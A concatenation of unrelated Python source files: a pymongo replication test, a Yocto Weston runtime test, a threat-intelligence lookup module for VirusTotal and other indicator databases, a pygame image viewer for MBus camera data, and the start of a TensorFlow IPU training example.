coll = db.test
coll.drop()
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({}, coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
w = 1 + len(self.slaves)
wtimeout = 10000  # Wait 10 seconds for replication to complete
c.set_lasterror_options(w=w, wtimeout=wtimeout)
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, db.get_lasterror_options())
coll = db.test
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout},
coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
coll.insert({'foo': 'bar'})
self.assertEqual(1, coll.find({'foo': 'bar'}).count())
self.assertTrue(coll.find({'foo': 'bar'}))
coll.remove({'foo': 'bar'})
self.assertEqual(0, coll.find({'foo': 'bar'}).count())
c.safe = False
c.unset_lasterror_options()
self.assertFalse(self.client.slave_okay)
self.assertTrue(bool(self.client.read_preference))
self.assertFalse(self.client.safe)
self.assertEqual({}, self.client.get_lasterror_options())
def test_document_class(self):
c = MasterSlaveConnection(self.master, self.slaves)
db = c.pymongo_test
w = 1 + len(self.slaves)
db.test.insert({"x": 1}, w=w)
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c = MasterSlaveConnection(self.master, self.slaves, document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
def test_tz_aware(self):
dt = datetime.datetime.utcnow()
client = MasterSlaveConnection(self.master, self.slaves)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
w = 1 + len(self.slaves)
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=True)
self.assertEqual(True, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(utc, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=False)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
if __name__ == "__main__":
unittest.main()
|
weston.py
|
#
# SPDX-License-Identifier: MIT
#
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
from oeqa.runtime.decorator.package import OEHasPackage
import threading
import time
class WestonTest(OERuntimeTestCase):
weston_log_file = '/tmp/weston.log'
@classmethod
def tearDownClass(cls):
cls.tc.target.run('rm %s' % cls.weston_log_file)
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['weston'])
def test_weston_running(self):
cmd ='%s | grep [w]eston-desktop-shell' % self.tc.target_cmds['ps']
status, output = self.target.run(cmd)
msg = ('Weston does not appear to be running: %s' %
self.target.run(self.tc.target_cmds['ps'])[1])
self.assertEqual(status, 0, msg=msg)
def get_processes_of(self, target, error_msg):
status, output = self.target.run('pidof %s' % target)
self.assertEqual(status, 0, msg='Retrieve %s (%s) processes error: %s' % (target, error_msg, output))
return output.split(" ")
def get_weston_command(self, cmd):
return 'export XDG_RUNTIME_DIR=/run/user/0; export WAYLAND_DISPLAY=wayland-0; %s' % cmd
def run_weston_init(self):
self.target.run(self.get_weston_command('weston --log=%s' % self.weston_log_file))
def get_new_wayland_processes(self, existing_wl_processes):
try_cnt = 0
while try_cnt < 5:
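# back off progressively: 5, 10, 15, 20, 25 seconds between checks (up to ~75 s total)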
time.sleep(5 + 5*try_cnt)
try_cnt += 1
wl_processes = self.get_processes_of('weston-desktop-shell', 'existing and new')
new_wl_processes = [x for x in wl_processes if x not in existing_wl_processes]
if new_wl_processes:
return new_wl_processes, try_cnt
return new_wl_processes, try_cnt
@OEHasPackage(['weston'])
def test_weston_info(self):
status, output = self.target.run(self.get_weston_command('weston-info'))
self.assertEqual(status, 0, msg='weston-info error: %s' % output)
@OEHasPackage(['weston'])
def test_weston_can_initialize_new_wayland_compositor(self):
existing_wl_processes = self.get_processes_of('weston-desktop-shell', 'existing')
existing_weston_processes = self.get_processes_of('weston', 'existing')
weston_thread = threading.Thread(target=self.run_weston_init)
weston_thread.start()
new_wl_processes, try_cnt = self.get_new_wayland_processes(existing_wl_processes)
existing_and_new_weston_processes = self.get_processes_of('weston', 'existing and new')
new_weston_processes = [x for x in existing_and_new_weston_processes if x not in existing_weston_processes]
for w in new_weston_processes:
self.target.run('kill -9 %s' % w)
__, weston_log = self.target.run('cat %s' % self.weston_log_file)
self.assertTrue(new_wl_processes, msg='Could not get new weston-desktop-shell processes (%s, try_cnt:%s) weston log: %s' % (new_wl_processes, try_cnt, weston_log))
|
datasource.py
|
__author__ = 'beepi'
from queryable import *
import requests
import time
from datetime import datetime
from math import ceil
from Queue import Queue, Empty
from threading import Thread
class PrivateVTQueryable(Queryable):
_alias = "vtpriv"
_name = 'VirusTotal - Private API'
def get_hash_info(self, q, results_list):
'''
Gets information for every hash in the queue from VT's API and appends Record objects to results_list
:return: None (results are appended to results_list)
'''
hashes_list = []
# My preferred AV's priority
engines_list = ['Microsoft', 'TrendMicro', 'Symantec', 'ESET-NOD32', 'McAfee']
while q.qsize() > 0:
for i in range(25):
try:
hashes_list.append(q.get_nowait())
except Empty:
break
params = {'apikey': self.settings['api_key'], 'resource': ','.join(hashes_list)}
response = requests.get('https://www.virustotal.com/vtapi/v2/file/report', params=params)
json_response = response.json()
# If one result returned - put it in a list
if isinstance(json_response, dict):
# When searching for hash only, verify it exists first
if json_response['response_code'] <= 0:
return None
json_response = [json_response,]
for item in json_response:
hash_id = item['scan_id']
hash_scan_date = item['scan_date']
hash_permalink = item['permalink']
hash_positives = item['positives']
hash_total = item['total']
formatted_scan_date = datetime.strptime(hash_scan_date, '%Y-%m-%d %H:%M:%S')
hash_result = None
# Looking for the most suitable AV generic signature of the hash
for engine in engines_list:
try:
if item['scans'][engine]['result']:
hash_result = [engine, item['scans'][engine]['result']]
break
# Catch KeyError in case the engine doesn't exist
except KeyError:
continue
r = Record()
r.id = hash_id
r.datetime = time.mktime(formatted_scan_date.timetuple())
r.description = 'Unknown'
r.data = 'Detection Ratio: {}/{}\n' \
'Permalink: {}'.format(hash_positives, hash_total, hash_permalink)
# Add description if hash was detected by one of the major AVs
if hash_result:
r.description = '{} detected it as {}'.format(hash_result[0], hash_result[1])
results_list.append(r)
def _query(self, phrase):
'''
Implement the way we search through VT's Private API
:return: List
'''
q = Queue()
workers_list = []
results_list = []
if phrase.type == QueryPhrase.TYPE_HASH:
q.put(phrase.data)
# Using VT's search API for anything that isn't of type hash
else:
params = {'apikey': self.settings['api_key'], 'query': phrase.data}
response = requests.get('https://www.virustotal.com/vtapi/v2/file/search', params=params)
response_json = response.json()
if response_json['response_code'] <= 0 :
return None
for hash in response_json['hashes'][:self.settings['max_results']]:
q.put(hash)
# Calculates number of threads needed (1 thread for each 25 hashes)
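# e.g. 60 queued hashes -> ceil(60/25) = 3 workers, each draining up to 25 hashes per VT report request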
num_threads = int(ceil(float(q.qsize())/25))
for i in range(num_threads):
worker = Thread(target=self.get_hash_info, args=(q, results_list))
workers_list.append(worker)
worker.start()
for w in workers_list:
w.join()
return results_list
import requests
import time
from datetime import datetime
class PublicVTQueryable(Queryable):
_alias = "vtpub"
_name = 'VirusTotal - Public API'
def parse_field(self, items, description, phrase_data):
'''
Parses all lines of one VT field and builds one record object out of it
:return: Queryable record object
'''
data = []
for item in items[:self.settings['max_results']]:
positives = item['positives']
total = item['total']
if 'scan_date' in item:
date = item['scan_date']
elif 'date' in item:
date = item['date']
else:
date = None
if 'url' in item:
resource = item['url'].replace('http://','hXXp://')
elif 'sha256' in item:
resource = item['sha256']
else:
resource = None
line = 'Detection: {}/{} | {date}Resource: {}'.format(positives, total, resource, date='{} | '.format(date) if date else '')
data.append(line)
data = '\n'.join(data)
r = Record()
r.description = description
r.data = data
r.id = ' - https://www.virustotal.com/en/search?query={}'.format(phrase_data)
r.datetime = 1
return r
def _query(self, phrase):
'''
Implement the way we search through VT's Public API
:return: List
'''
params = {'apikey': self.settings['api_key']}
if phrase.type == QueryPhrase.TYPE_IP:
params['ip'] = phrase.data
url = 'https://www.virustotal.com/vtapi/v2/ip-address/report'
elif phrase.type == QueryPhrase.TYPE_DOMAIN:
params['domain'] = phrase.data
url = 'https://www.virustotal.com/vtapi/v2/domain/report'
elif phrase.type == QueryPhrase.TYPE_URL:
params['resource'] = phrase.data
url = 'https://www.virustotal.com/vtapi/v2/url/report'
elif phrase.type == QueryPhrase.TYPE_HASH:
#raise ValueError("Please use VT Private API for hash lookup")
return None
elif phrase.type == QueryPhrase.TYPE_MAIL:
#raise ValueError("VT Public API doesn't support email format")
return None
else:
return None
response = requests.get(url, params=params)
response_json = response.json()
if response_json['response_code'] <= 0 :
return None
results_list = []
fields = {
'detected_urls': 'Latest URLs hosted in this IP address',
'detected_communicating_samples': 'Latest detected files that communicate with this IP address',
'detected_downloaded_samples': 'Latest detected files that were downloaded from this IP address',
'detected_referrer_samples': 'Latest detected files that embed this IP address in their strings',
'undetected_communicating_samples': 'Latest undetected files that communicate with this IP address',
'undetected_downloaded_samples': 'Latest undetected files that were downloaded from this IP address',
'undetected_referrer_samples': 'Latest undetected files that embed this IP address in their strings',
}
for field, desc in fields.iteritems():
try:
field = response_json[field]
r = self.parse_field(field, desc, phrase.data)
results_list.append(r)
except KeyError:
continue
# If no significant information found in VT, returns resource's detection ratio
if not results_list:
try:
resource_id = response_json['scan_id']
resource_scan_date = response_json['scan_date']
hash_permalink = response_json['permalink']
resource_positives = response_json['positives']
resource_total = response_json['total']
formatted_scan_date = datetime.strptime(resource_scan_date, '%Y-%m-%d %H:%M:%S')
r = Record()
r.id = resource_id
r.datetime = time.mktime(formatted_scan_date.timetuple())
r.description = 'Detection Ratio: {} / {}'.format(resource_positives, resource_total)
#r.data = 'Permalink: https://www.virustotal.com/en/search?query={}'.format(phrase.data)
r.data = 'Permalink: {}'.format(hash_permalink)
results_list.append(r)
except ValueError:
return None
return results_list
import requests
import time
from datetime import datetime
class FWatchPortalQueryable(Queryable):
_alias = "portal"
_name = 'FirstWatch Threat Portal'
def _query(self, phrase):
'''
Implement the way we search through FirstWatch Threat Portal
:return: List
'''
portal_api = 'http://{}:{}/api/record/get'.format(self.settings['host_ip'], self.settings['host_port'])
params = {'token': self.settings['token'], 'resource': phrase.data}
response = requests.get(portal_api, params=params)
if response.text == 'found 0 matching records':
return None
response_json = response.json()
results_list = []
for collection in response_json[:self.settings['max_results']]:
collection_name = collection['collection']
for record in collection['data']:
threat_id = record['_id']['$oid']
threat_date_added = (record['date_added']['$date'] / 1000)
formatted_date_added = datetime.fromtimestamp(threat_date_added)
threat_description = record['threat_description']
threat_category = record['threat_category']
threat_source = record['threat_source']
comments = ''
for comment in record['comments']:
comments += '\n"{}" commented by {}'.format(comment['text'], comment['author'])
r = Record()
r.id = threat_id
r.datetime = time.mktime(formatted_date_added.timetuple())
r.description = 'Found in collection: {}'.format(collection_name)
r.data = 'Threat Description: {}\nThreat Category: {}\nThreat Source: {}\n{}'.format(threat_description, threat_category, threat_source, comments)
results_list.append(r)
return results_list
import MySQLdb
import MySQLdb.cursors
class ATSIncQueryable(Queryable):
_alias = "atsinc"
_name = 'ATSInc'
def build_select(self, data):
'''
Building the select query for MYSQL database
:return:
SQL query as Format String
SELECT fields in a Tuple
'''
select_tuple = ()
columns = ['host_drop', 'host_ip', 'drop_url', 'infection_url', 'config_url', 'md5', 'analysis', 'comments']
query = 'SELECT {0}.id, {0}.create_date, {0}.drop_url, trojan_family.family_name ' \
'FROM {1}.{0} ' \
'LEFT JOIN {1}.trojan_family ' \
'ON {0}.trojan_family_id = trojan_family.id ' \
'WHERE '.format(self.settings['table'], self.settings['db'])
for field in columns:
select_tuple += ('%{}%'.format(data),)
query += '({} LIKE %s)'.format(field)
if field != columns[-1]:
query += ' OR '
query += ' LIMIT {}'.format(self.settings['max_results'])
return query, select_tuple
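# For example, build_select('evil.com') returns (roughly):
#   SELECT <table>.id, <table>.create_date, <table>.drop_url, trojan_family.family_name
#   FROM <db>.<table> LEFT JOIN <db>.trojan_family ON <table>.trojan_family_id = trojan_family.id
#   WHERE (host_drop LIKE %s) OR ... OR (comments LIKE %s) LIMIT <max_results>
# plus a tuple of eight '%evil.com%' parameters, one per LIKE clause.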
def _query(self, phrase):
'''
Implement the way we search through ATSInc
:return: List
'''
# Avoid searching for phrases shorter than 4 characters
if len(phrase.data) < 4:
#raise ValueError('Phrase must be at least 4 characters long')
return None
db = MySQLdb.connect(self.settings['host'], self.settings['user'], self.settings['pass'], self.settings['db'],
cursorclass=MySQLdb.cursors.DictCursor)
cur = db.cursor()
query, select_tuple = self.build_select(phrase.data)
cur.execute(query, select_tuple)
rows = cur.fetchall()
results_list = []
for row in rows:
row_id = int(row['id'])
row_creation_date = row['create_date']
row_trojan_family = row['family_name']
row_drop_url = row['drop_url'].replace('http://','hXXp://')
r = Record()
r.id = row_id
r.datetime = time.mktime(row_creation_date.timetuple())
r.description = 'Resource related to {} Trojan'.format(row_trojan_family)
r.data = 'Drop-Point URL: {}'.format(row_drop_url)
results_list.append(r)
return results_list
import ast
import re
import urllib2
from urllib import urlencode
class SpartaQueryable(Queryable):
_alias = "sparta"
_name = 'Sparta'
def basic_auth_connect(self, url, username, password):
'''
Implement an HTTP basic auth connection for req_solr
:return: urllib2 response object
'''
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, url, username, password)
auth_handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
conn = urllib2.urlopen(url)
return conn
def add_get_params(self, select, fields="*", resp_format="python"):
get_params = {'qt': 'dist',
'q': select,
'fl': fields,
'rows': self.settings['max_results'],
'wt': resp_format,
'omitHeader': 'true'
}
get_params = urlencode(get_params)
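# yields an urlencoded query string, e.g. something like
# 'qt=dist&q=domain%3Aevil.com+OR+...&fl=...&rows=<max_results>&wt=python&omitHeader=true' (order may vary)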
return get_params
def req_solr(self, get_params):
'''
Implement the way we query Apache Solr
:return: database response as Dict
'''
url = self.settings['url'] + "/select?" + get_params
conn = self.basic_auth_connect(url,self.settings['user'],self.settings['pass'])
response = ast.literal_eval(conn.read())
if response['response']['numFound']:
return response
def _query(self, phrase):
'''
Implement the way we search through Sparta
:return: List
'''
query = "domain:{0} OR host:{0} OR ip:{0} OR url:{0} OR dropPointUrl:{0} OR emails:{0}".format(re.escape(phrase.data))
get_params = self.add_get_params(query, "id, creationDate, trojanFamilyName, dropPointUrl, stolenDate")
sparta_result = self.req_solr(get_params)
if sparta_result:
results_list = []
for document in sparta_result['response']['docs']:
doc_id = document['id']
doc_creation_date = document['creationDate']
doc_trojan_type = document['trojanFamilyName']
doc_drop_url = document['dropPointUrl'].replace('http://','hXXp://')
doc_stolen_date = document['stolenDate']
formatted_stolen_date = datetime.strptime(doc_stolen_date, '%Y-%m-%dT%H:%M:%SZ')
try:
formatted_creation_date = datetime.strptime(doc_creation_date, '%Y-%m-%dT%H:%M:%S.%fZ')
except ValueError:
formatted_creation_date = datetime.strptime(doc_creation_date, '%Y-%m-%dT%H:%M:%SZ')
r = Record()
r.id = doc_id
r.datetime = time.mktime(formatted_creation_date.timetuple())
r.description = 'Resource related to {} Trojan'.format(doc_trojan_type)
r.data = 'Exfiltrated data sent to URL: {} @ {}'.format(doc_drop_url, formatted_stolen_date)
results_list.append(r)
return results_list
'''
class ExampleFeedQueryable(Queryable):
_alias = "example"
_name = 'Example Feed'
def _query(self, data):
Your logic goes here...
for item in list:
r = Record()
r.id = 1234
r.datetime = '1234567890'
r.description = 'Found indication evilness all over'
r.data ='Evil data is evil'
results_list.append(r)
return results_list
'''
|
goc_to_image.py
|
#!/usr/bin/env python2
import argparse
import csv
from pprint import pprint
import os
import struct
import sys
import time
import threading
import queue
import numpy as np
import pygame
import pygame.fastevent
from pygame.locals import *
import m3_common
from m3_logging import get_logger
logger = get_logger(__name__)
rotate_90 = True
################################################################################
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', default=None,
help="Read image data from a file saved from a Saleae capture")
parser.add_argument('-s', '--serial', default=None,
help="Snoop image data via an ICE board on this serial port")
parser.add_argument('-a', '--address',
type=lambda x: int(x, 0),
default=(0x17,),
nargs='+',
help="MBus address(es) image data is sent to")
parser.add_argument('-o', '--output-directory',
default='goc-img-'+time.strftime('%Y-%m-%d--%H-%M-%S'),
help="Save images into this directory")
parser.add_argument('-p', '--pixels', type=int, default=160,
help="Number of pixels in a single row of the image")
parser.add_argument('-m', '--multiplier', type=float, default=1.0,
help="Multiple each raw pixel value by this amount")
parser.add_argument('-l', '--scale', type=int, default=4,
help="Multiplier to scale the image")
parser.add_argument('-H', '--hot-pixel-map', default=None,
help="Dark image with a few 'hot' pixels to remove and average with neighbors")
parser.add_argument('--hot-pixel-threshold', type=int, default=25,
help="Pixels at or above this value will be considered hot")
args = parser.parse_args()
if args.file is None and args.serial is None:
print("Error: Must specify one of -f or -s")
print("")
parser.print_help()
sys.exit(1)
if args.file is not None and args.serial is not None:
print("Error: Can only specify one of -f or -s")
print("")
parser.print_help()
sys.exit(1)
os.mkdir(args.output_directory)
################################################################################
hot_pixel_map = np.zeros((args.pixels,args.pixels), bool)
hot_pixel_list = []
if args.hot_pixel_map:
for i,row in enumerate(csv.reader(open(args.hot_pixel_map))):
for j,pixel in enumerate(map(int, row)):
if pixel >= args.hot_pixel_threshold:
hot_pixel_map[i, j] = True
hot_pixel_list.append((i,j))
################################################################################
pygame.init()
option_divider_height = 2 * args.scale
option_text_height = 20 * args.scale
window_width = args.pixels * args.scale
window_height = args.pixels * args.scale + option_divider_height + option_text_height
windowSurfaceObj = pygame.display.set_mode((window_width,window_height))
pygame.display.set_caption('GOC Test')
gocSurfaceObj = windowSurfaceObj.subsurface((0, 0, args.pixels * args.scale, args.pixels * args.scale))
RED = pygame.Color(255, 0, 0)
GREEN = pygame.Color( 0, 255, 0)
BLUE = pygame.Color( 0, 0, 255)
WHITE = pygame.Color(255, 255, 255)
BLACK = pygame.Color( 0, 0, 0)
colors = [pygame.Color(x,x,x) for x in range(256)]
colors.insert(0, RED)
# http://stackoverflow.com/questions/17202232/even-with-pygame-initialized-video-system-not-initialized-gets-thrown
# possible cygwin fix?
pygame.fastevent.init()
class Option(object):
hovered = False
def __init__(self, text, pos):
self.text = text
self.pos = pos
self.set_rect()
self.draw()
def __setattr__(self, name, value):
if name == 'hovered':
pygame.display.update(self.rect)
object.__setattr__(self, name, value)
def draw(self):
self.set_rend()
windowSurfaceObj.blit(self.rend, self.rect)
def set_rend(self):
self.rend = options_font.render(self.text, True, self.get_color())
#self.rend = options_font.render(self.text, False, self.get_color())
def get_color(self):
if self.hovered:
return (255, 255, 255)
else:
return (100, 100, 100)
def set_rect(self):
self.set_rend()
self.rect = self.rend.get_rect()
self.rect.topleft = self.pos
def onClick(self):
try:
self.on_click()
except AttributeError:
pass
options_font = pygame.font.Font(None, option_text_height)
options = {
'prev' : Option("PREV", (10*args.scale + -10*args.scale, args.pixels*args.scale + option_divider_height)),
'save' : Option("SAVE", (10*args.scale + 50*args.scale, args.pixels*args.scale + option_divider_height)),
'next' : Option("NEXT", (10*args.scale + 110*args.scale, args.pixels*args.scale + option_divider_height)),
}
options_divider = pygame.Rect(0, args.pixels*args.scale, window_width, option_divider_height)
windowSurfaceObj.fill(BLUE, options_divider)
################################################################################
def get_addr17_msg_file():
data = []
searching = True
for line in open(args.file):
line = line.strip()
if searching:
if line in ['Address {:x}'.format(a) for a in args.address]:
searching = False
continue
if line.split()[0] == 'Data':
data.append(int(line.split()[1], 16))
continue
yield data
data = []
if line not in ['Address {:x}'.format(a) for a in args.address]:
searching = True
serial_queue = queue.Queue()
def get_addr17_msg_serial():
while True:
addr, data = serial_queue.get()
addr = int(addr.encode('hex'), 16)
if addr in args.address:
data = list(map(ord, data))
yield data
else:
logger.debug("bad addr {:x}".format(addr))
def Bpp_callback(address, data):
serial_queue.put((address, data))
class preparsed_snooper(m3_common.mbus_snooper):
def __init__(self, args, *pyargs, **kwargs):
self.args = args
super(preparsed_snooper,self).__init__(*pyargs, **kwargs)
def parse_args(self):
self.serial_path = self.args.serial
if args.file:
get_addr17_msg = get_addr17_msg_file
else:
snooper = preparsed_snooper(args=args, callback=Bpp_callback)
get_addr17_msg = get_addr17_msg_serial
def is_end_of_image_msg(m):
if len(m) == 4:
data = struct.unpack(">I", struct.pack("BBBB", *m))[0]
data = data & 0x0000CFFF
if data == 0:
return True
return False
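# A small, hypothetical self-check of the mask logic above (not part of the
# original tool): a 4-byte message whose bits under 0x0000CFFF are all zero is
# treated as end-of-image; any other 4-byte message is treated as motion-detect.
def _end_of_image_demo():
    # 0x12300000 & 0x0000CFFF == 0 -> end of image
    assert is_end_of_image_msg([0x12, 0x30, 0x00, 0x00])
    # 0x12300001 & 0x0000CFFF == 1 -> not an end-of-image marker
    assert not is_end_of_image_msg([0x12, 0x30, 0x00, 0x01])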
# Decent guess for now
def is_motion_detect_msg(m):
if len(m) == 4:
if not is_end_of_image_msg(m):
return True
def get_image_g(data_generator):
class UnexpectedAddressException(Exception):
pass
while True:
data = np.zeros((args.pixels,args.pixels), int)
end_of_image = False
# Grab an image
for row in range(args.pixels):
r = next(data_generator)
while is_motion_detect_msg(r):
print("Skipping motion detect message")
r = next(data_generator)
if is_end_of_image_msg(r):
print("Unexpected end-of-image. Expecting row", row + 1)
print("Returning partial image")
end_of_image = True
break
if len(r) != args.pixels:
print("Row %d message incorrect length: %d" % (row, len(r)))
print("Using first %d pixel(s)" % (min(len(r), args.pixels)))
for p in range(min(len(r), args.pixels)):
data[row][p] = r[p] + 1
while not end_of_image:
m = next(data_generator)
if is_end_of_image_msg(m):
break
print("Expected end-of-image. Got message of length:", len(m))
# If the imager sends more rows than expected, discard the earliest
# received rows. Works around a wakeup bug.
data = np.roll(data, -1, axis=0)
for p in range(min(len(m), args.pixels)):
data[-1][p] = m[p] + 1
if len(m) != args.pixels:
print("Extra row message incorrect length: %d" % (len(m)))
print("Zeroing remaining pixels")
for p in range(len(m), args.pixels):
data[-1][p] = 0
yield data
def correct_endianish_thing_old(data, array):
for row in range(args.pixels):
for colset in range(0, args.pixels, 4):
for i in range(4):
if rotate_90:
val = data[colset+3-i][row]
else:
val = data[row][colset+3-i]
val = int(val)
if (val):
val -= 1
color = pygame.Color(val, val, val)
rgb = gocSurfaceObj.map_rgb(color)
else:
rgb = gocSurfaceObj.map_rgb(RED)
array[row][colset+i] = rgb
def correct_endianish_thing(data, array):
for rowbase in range(0, args.pixels, 4):
for rowi in range(4):
for col in range(0, args.pixels):
if rotate_90:
val = data[col][rowbase + 3-rowi]
else:
val = data[rowbase + 3-rowi][col]
val = int(val)
val = int(val * args.multiplier)
if (val):
val -= 1
if val > 255:
logger.warn("Pixel value > 255, capping at 255")
val = 255
color = pygame.Color(val, val, val)
rgb = gocSurfaceObj.map_rgb(color)
else:
rgb = gocSurfaceObj.map_rgb(RED)
array[rowbase+rowi][col] = rgb
images_q = queue.Queue()
def process_hot_pixels(img):
img = img.copy()
if args.hot_pixel_map is None:
return img
ret = []
for hp in hot_pixel_list:
neighbors = []
for i in (-1,0,1):
for j in (-1, 0, 1):
if i == j == 0:
continue
try:
neighbors.append(img[hp[0]+i,hp[1]+j])
except IndexError:
pass
img[hp[0], hp[1]] = np.mean(neighbors)
return img
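# A minimal, hypothetical sketch of the neighbor-averaging idea implemented by
# process_hot_pixels() above, shown on a toy 3x3 array. The helper name and the
# test data are illustrative only and are not used elsewhere in this tool; it
# assumes numpy is already imported as np (as it is in this script).
def _hot_pixel_demo():
    demo = np.array([[10, 10, 10],
                     [10, 255, 10],
                     [10, 10, 10]], dtype=float)
    # Replace the centre "hot" pixel with the mean of its 8 neighbours.
    neighbors = [demo[1 + i, 1 + j]
                 for i in (-1, 0, 1) for j in (-1, 0, 1)
                 if not (i == 0 and j == 0)]
    demo[1, 1] = np.mean(neighbors)
    return demo  # the centre value becomes 10.0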
def get_images():
if args.file:
print("Processing static file")
images_g = get_image_g(get_addr17_msg_file())
for img in images_g:
hot = process_hot_pixels(img)
images_q.put((img, hot))
print("Done reading file")
event = pygame.event.Event(pygame.USEREVENT)
pygame.fastevent.post(event)
elif args.serial:
images_g = get_image_g(get_addr17_msg_serial())
for img in images_g:
hot = process_hot_pixels(img)
images_q.put((img, hot))
event = pygame.event.Event(pygame.USEREVENT)
pygame.fastevent.post(event)
print("ERR: Should never get here [serial image_g terminated]")
get_images_thread = threading.Thread(target=get_images)
get_images_thread.daemon = True
get_images_thread.start()
images = []
images_raw = []
def get_image_idx(idx):
global images
global images_raw
while True:
try:
raw,hot = images_q.get_nowait()
images_raw.append(raw)
images.append(hot)
except queue.Empty:
break
return images[idx]
################################################################################
pygame.event.set_allowed(None)
pygame.event.set_allowed((QUIT, KEYUP, MOUSEBUTTONUP, MOUSEMOTION))
goc_raw_Surface = pygame.Surface((args.pixels, args.pixels))
def render_raw_goc_data(data):
print("Request to render raw goc data")
print("Correcting pixel order bug")
surface_array = pygame.surfarray.pixels2d(goc_raw_Surface)
correct_endianish_thing(data, surface_array)
del surface_array
print("Scaling %d pixel --> %d pixel%s" % (1, args.scale, ('s','')[args.scale == 1]))
pygame.transform.scale(goc_raw_Surface, (args.pixels*args.scale, args.pixels*args.scale), gocSurfaceObj)
print("Rendering Image")
pygame.display.update()
print()
def render_image_idx(idx):
print("Request to render image", idx)
render_raw_goc_data(get_image_idx(idx))
def save_image(filename):
pygame.image.save(gocSurfaceObj, filename)
print('Image saved to', filename)
def save_image_hack():
imgname = "capture%02d.jpeg" % (current_idx)
imgname = os.path.join(args.output_directory, imgname)
save_image(imgname)
csvname = "capture%02d.csv" % (current_idx)
csvname = os.path.join(args.output_directory, csvname)
ofile = csv.writer(open(csvname, 'w'), dialect='excel')
ofile.writerows(get_image_idx(current_idx))
if args.hot_pixel_map:
raw_csvname = "raw_capture%02d.csv" % (current_idx)
raw_csvname = os.path.join(args.output_directory, raw_csvname)
raw_ofile = csv.writer(open(raw_csvname, 'w'), dialect='excel')
raw_ofile.writerows(images_raw[current_idx])
print('CSV of image saved to', csvname)
options['save'].on_click = save_image_hack
def advance_image():
global current_idx
current_idx += 1
try:
render_image_idx(current_idx)
save_image_hack()
except IndexError:
current_idx -= 1
print("At last image. Display left at image", current_idx)
print()
options['next'].on_click = advance_image
def rewind_image():
global current_idx
current_idx = max(0, current_idx-1)
render_image_idx(current_idx)
options['prev'].on_click = rewind_image
def quit():
pygame.quit()
sys.exit()
current_idx = -1
advance_image()
while True:
event = pygame.event.wait()
if event.type == QUIT:
quit()
if event.type == MOUSEBUTTONUP:
for option in list(options.values()):
if option.rect.collidepoint(pygame.mouse.get_pos()):
option.onClick()
if event.type == MOUSEMOTION:
for option in list(options.values()):
if option.rect.collidepoint(pygame.mouse.get_pos()):
option.hovered = True
else:
option.hovered = False
option.draw()
if event.type == KEYUP:
if event.key == K_RIGHT:
advance_image()
elif event.key == K_LEFT:
rewind_image()
elif event.key == K_RETURN:
save_image_hack()
elif event.key == K_ESCAPE:
quit()
if event.type == USEREVENT:
advance_image()
|
outfeed_example.py
|
from threading import Thread
from tensorflow.python import ipu
import tensorflow as tf
NUM_ITERATIONS = 100
#
# Configure the IPU system
#
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.configure_ipu_system()
#
# The input data and labels
#
def create_dataset():
mnist = tf.keras.datasets.mnist
(x_train, y_train), (_, _) = mnist.load_data()
x_train = x_train / 255.0
train_ds = tf.data.Dataset.from_tensor_slices(
(x_train, y_train)).shuffle(10000)
train_ds = train_ds.map(lambda d, l:
(tf.cast(d, tf.float32), tf.cast(l, tf.int32)))
train_ds = train_ds.batch(32, drop_remainder=True)
return train_ds.repeat()
#
# The host side queue
#
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
#
# A custom training loop
#
@tf.function(experimental_compile=True)
def training_step(num_iterations, iterator, in_model, optimizer):
for _ in tf.range(num_iterations):
features, labels = next(iterator)
with tf.GradientTape() as tape:
predictions = in_model(features, training=True)
prediction_loss = tf.keras.losses.sparse_categorical_crossentropy(
labels, predictions)
loss = tf.reduce_mean(prediction_loss)
grads = tape.gradient(loss, in_model.trainable_variables)
optimizer.apply_gradients(zip(grads, in_model.trainable_variables))
outfeed_queue.enqueue(loss)
#
# Execute the graph
#
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
# Create the Keras model and optimizer.
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
